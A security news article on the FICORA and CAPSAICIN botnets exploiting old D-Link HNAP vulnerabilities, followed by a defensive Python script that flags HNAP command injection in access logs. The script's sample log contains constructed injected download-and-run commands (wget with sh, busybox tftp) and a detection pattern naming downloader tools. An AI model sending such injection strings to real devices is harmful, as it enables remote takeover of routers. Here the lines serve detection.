D-Link Devices Under Attack: Dangerous FICORA and Kaiten Botnets Exploit Legacy Vulnerabilities


Security researchers at FortiGuard Labs have detected an uptick in malicious activity from two dangerous botnets targeting vulnerable D-Link devices worldwide.

The two threats - a Mirai variant called "FICORA" and a Kaiten variant known as "CAPSAICIN" - exploit known vulnerabilities in D-Link's HNAP (Home Network Administration Protocol) management interface to execute commands on the device and take it over remotely. The botnets abuse several flaws in that interface, the oldest of which was disclosed in 2015.

"Attackers frequently reuse older attacks, which explains why these botnets continue to spread to new victims," noted FortiGuard Labs researchers in their latest threat report.

The FICORA botnet has shown widespread activity across multiple countries. Its initial payload is a shell script that downloads and executes the malware on the compromised Linux device. The bot can launch DDoS attacks over several protocols, including UDP, TCP, and DNS, and its configuration and command-and-control server details are stored encrypted with ChaCha20.

Meanwhile, the CAPSAICIN botnet showed intense but brief activity over just two days in October 2024, primarily affecting East Asian countries. This variant appears to belong to the Keksec group's malware family, specifically version 17.0.0. It uses a downloader script that fetches builds for different Linux architectures, and it kills processes belonging to other known botnets so that it alone controls the device.

Both botnets exploit vulnerabilities that have been public, and patched by the vendor, for years, the oldest for nearly a decade, which highlights the persistent risk posed by unpatched devices. Security experts recommend keeping device firmware up to date (and replacing models that no longer receive updates), and monitoring network traffic for exploitation attempts against management interfaces such as HNAP and for the follow-on download of payloads.
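The monitoring advice above can be made concrete. The following Python script is an added example for this article, not code from FortiGuard Labs, D-Link, or either botnet. It scans web-server style access logs for requests to the HNAP endpoint whose SOAPAction header carries shell metacharacters or fetch-and-run tooling (wget, curl, tftp, busybox), the two indicators that distinguish an exploitation attempt followed by a downloader from a legitimate HNAP call. It assumes a log format in which the SOAPAction header is appended to each combined-format line as soapaction="..." (an assumption; adjust LINE_RE to your logger), and assumes that injected commands arrive inside that header, which is the usual shape of HNAP command injection but is not stated on this page. The log lines are constructed for the example.

```python
"""Flag HNAP command-injection and downloader indicators in HTTP access logs.

Added example; not FortiGuard, D-Link, or botnet code. Assumes (not from the
article) that the SOAPAction header is logged as soapaction="..." at the end of
each combined-format line and that injected commands are carried in that header.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample log lines (not real captures). Line 1 is a legitimate HNAP
# call, line 3 a harmless GET; lines 2 and 4 carry injected download-and-run
# commands of the kind a Mirai/Kaiten dropper stage would send.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Oct/2024:10:15:01 +0000] "POST /HNAP1/ HTTP/1.1" 200 512 "-" "Mozilla/5.0" soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings"
198.51.100.7 - - [26/Oct/2024:10:15:02 +0000] "POST /HNAP1/ HTTP/1.1" 200 87 "-" "-" soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; wget http://198.51.100.7/bins.sh; sh bins.sh`"
198.51.100.9 - - [26/Oct/2024:10:15:03 +0000] "GET /HNAP1/ HTTP/1.1" 200 1024 "-" "curl/7.68.0" soapaction="-"
192.0.2.44 - - [26/Oct/2024:10:15:04 +0000] "POST /HNAP1/ HTTP/1.1" 500 0 "-" "-" soapaction="http://purenetworks.com/HNAP1/GetDeviceSettings/$(busybox tftp -g -r x86 192.0.2.44)"
"""

# Combined log format with a trailing soapaction="..." field (assumed format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \d+ '
    r'"[^"]*" "(?P<ua>[^"]*)" soapaction="(?P<soap>.*)"$'
)

# Shell metacharacters that never belong in a SOAPAction URI.
SHELL_META_RE = re.compile(r'[`;|&]|\$\(')
# Fetch-and-run tooling and paths typical of Linux botnet downloader stages.
DOWNLOADER_RE = re.compile(r'\b(wget|curl|tftp|ftpget|busybox)\b|/tmp/|\.sh\b', re.I)


@dataclass
class Alert:
    src_ip: str
    timestamp: str
    soapaction: str
    reasons: List[str] = field(default_factory=list)


def inspect_line(line: str) -> Optional[Alert]:
    """Return an Alert if the line is an HNAP request with injection indicators."""
    m = LINE_RE.match(line)
    if not m or not m.group("path").lower().startswith("/hnap1"):
        return None
    soap = m.group("soap")
    reasons = []
    if SHELL_META_RE.search(soap):
        reasons.append("shell-metacharacters")
    if DOWNLOADER_RE.search(soap):
        reasons.append("downloader")
    if not reasons:
        return None
    return Alert(m.group("ip"), m.group("ts"), soap, reasons)


def analyze(log_text: str) -> List[Alert]:
    """Run inspect_line over every line and keep only the hits."""
    return [a for a in (inspect_line(l) for l in log_text.splitlines()) if a]


def sources(alerts: List[Alert]) -> Dict[str, int]:
    """Count alerts per source IP, a quick view of which hosts are scanning."""
    counts: Dict[str, int] = {}
    for a in alerts:
        counts[a.src_ip] = counts.get(a.src_ip, 0) + 1
    return counts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(f"{a.timestamp} {a.src_ip} {','.join(a.reasons)} :: {a.soapaction}")
    print(sources(analyze(SAMPLE_LOG)))
```

On the constructed input only the two lines with injected commands are flagged, each for both reasons; the legitimate GetDeviceSettings call is not. A failed attempt (HTTP 500) is still reported, since scanning activity is itself worth knowing about. Pair the per-source counts with an egress check: a device that starts fetching files over HTTP or TFTP from an address that just sent it an HNAP request has almost certainly run the dropper.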

The continued spread of these botnets serves as a reminder that aging vulnerabilities remain attractive targets for cybercriminals, even years after patches become available.